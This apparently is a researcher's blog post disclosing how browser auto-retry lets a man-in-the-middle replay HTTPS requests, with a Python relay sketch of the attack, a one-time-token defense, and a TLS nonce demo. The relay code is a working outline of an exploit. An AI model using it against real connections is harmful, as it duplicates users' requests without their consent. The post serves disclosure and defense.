(joint work with Thiago Valverde and Quan Nguyen -- see also Thiago's post on his blog)
I was once advised by a self-help book that I should never give up, be confident in myself, and keep trying. The secret to success is failure, wrote the book. I'd always believed this was great wisdom until Thiago and Quan helped me realize that it could lead to replay attacks.
A few weeks ago we found that because Chrome (and Firefox and possibly other browsers) automatically retries failed requests, a man-in-the-middle adversary can easily duplicate and replay HTTPS traffic. More details can be found in Thiago's blog post, but the attack can be summarized as follows:
* The adversary sets itself up as a TCP-layer relay for the targeted TLS connection to, say, google.com.
* When the adversary detects a request that it wants to replay (using traffic analysis), it copies all relevant TLS records, and instead of relaying the HTTP response from the server it just closes the socket to Chrome. It keeps the leg to google.com open.
* Over a fresh socket, Chrome automatically retries the (presumably failed) request. The adversary forwards it to google.com as usual.
* The adversary then replays the copied records to google.com, which happily accepts them.
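To make the flow concrete, here is a minimal Python sketch of the relay leg, under some assumptions of mine: the adversary withholds the captured request records from the server until after Chrome's retry has gone through, the request fits in a single TLS record, and `looks_like_target_request` is a purely hypothetical stand-in for real traffic analysis.

```python
import socket

UPSTREAM = ("google.com", 443)  # the targeted server

def read_record(sock):
    """Read exactly one TLS record: a 5-byte header plus `length` body bytes."""
    header = sock.recv(5, socket.MSG_WAITALL)
    if len(header) < 5:
        return None
    length = int.from_bytes(header[3:5], "big")
    return header + sock.recv(length, socket.MSG_WAITALL)

def looks_like_target_request(record):
    """Hypothetical traffic-analysis heuristic, e.g. keyed on record sizes."""
    return record[0] == 0x17 and len(record) > 512  # 0x17 = application data

def attack(client):
    """Relay `client` to the server, then deliver one request a second time."""
    server = socket.create_connection(UPSTREAM)
    held = None
    while held is None:
        record = read_record(client)
        if record is None:
            return
        if looks_like_target_request(record):
            held = record      # withhold the interesting request...
        else:
            server.sendall(record)
    # ...and kill Chrome's socket, so the request appears to have failed and
    # Chrome retries it over a fresh connection (relayed normally, not shown).
    client.close()
    # The leg to google.com is still open and has never seen `held`, so the
    # record arrives with the expected sequence number and is accepted.
    server.sendall(held)
```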
This is a cute attack, but we don't think it's too alarming. Thiago made a proof of concept that works like a charm against an internal tool at Google, but we failed to mount the attack against PayPal. It looks like most of the important websites we looked at have some defense against this attack, probably not because they are aware of it, but simply because they want to keep their users from unintentionally sending duplicate requests.
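For what it's worth, that kind of defense usually boils down to something like the sketch below: the server hands out a one-time token with each sensitive form and rejects any request whose token has already been spent. This is my own illustration of the idea, not how any of the sites we tested actually implement it (and a real deployment would keep the token state in a shared store, not in process memory).

```python
import secrets

issued = set()  # tokens handed out with forms, not yet used
spent = set()   # tokens that have already been used once

def new_form_token():
    """Embed the returned token in the form that triggers the request."""
    token = secrets.token_urlsafe(16)
    issued.add(token)
    return token

def handle_transfer(token, amount):
    """Execute the request at most once per issued token."""
    if token not in issued or token in spent:
        raise ValueError("unknown or duplicate request token")
    spent.add(token)
    print(f"transferring {amount}")  # hypothetical business logic

token = new_form_token()
handle_transfer(token, 100)      # the first submission goes through
try:
    handle_transfer(token, 100)  # the replayed copy is rejected
except ValueError as e:
    print(e)
```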
Still, it's amusing to think about what has gone wrong here. I don't blame TLS, which does the right thing when it comes to replay attacks. TLS promises that no one can replay its records, and it delivers on that promise by using random nonces and sequence numbers. No TLS records were replayed in our attack; we can't do that. What we replayed was the HTTP payload.
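To see why replaying records is hopeless, here is a toy version of the TLS 1.3 nonce construction, where each record's nonce is the static IV XORed with the record sequence number: re-delivering a ciphertext bumps the receiver's counter, so the nonce no longer matches and the authentication tag check fails. The sketch uses the pyca/cryptography package, and the key and IV are made up for the demo.

```python
from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=128)
static_iv = b"\x42" * 12  # in real TLS, both sides derive this in the handshake
aead = AESGCM(key)

def nonce(seq):
    """TLS 1.3 style: XOR the record sequence number into the static IV."""
    return bytes(a ^ b for a, b in zip(static_iv, seq.to_bytes(12, "big")))

# The sender encrypts record 0; the receiver decrypts with its counter at 0.
record = aead.encrypt(nonce(0), b"GET /transfer HTTP/1.1", None)
print(aead.decrypt(nonce(0), record, None))  # accepted; receiver moves to seq 1

# A replayed copy meets the receiver's counter at 1: wrong nonce, bad tag.
try:
    aead.decrypt(nonce(1), record, None)
except InvalidTag:
    print("replayed record rejected")
```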
This attack exploits a mismatch between what is promised by TLS and what is actually deployed. TLS proudly declares, "Alright, TLS clients and servers of the world, we protect your traffic against replay attacks," but our beloved protocol can do nothing when clients replay their own traffic, which is what happens in the real world. As a result, servers still have to defend themselves, which is surprising and might catch some developers off guard.
Moral of the story: give up on the first failure and stop reading self-help books.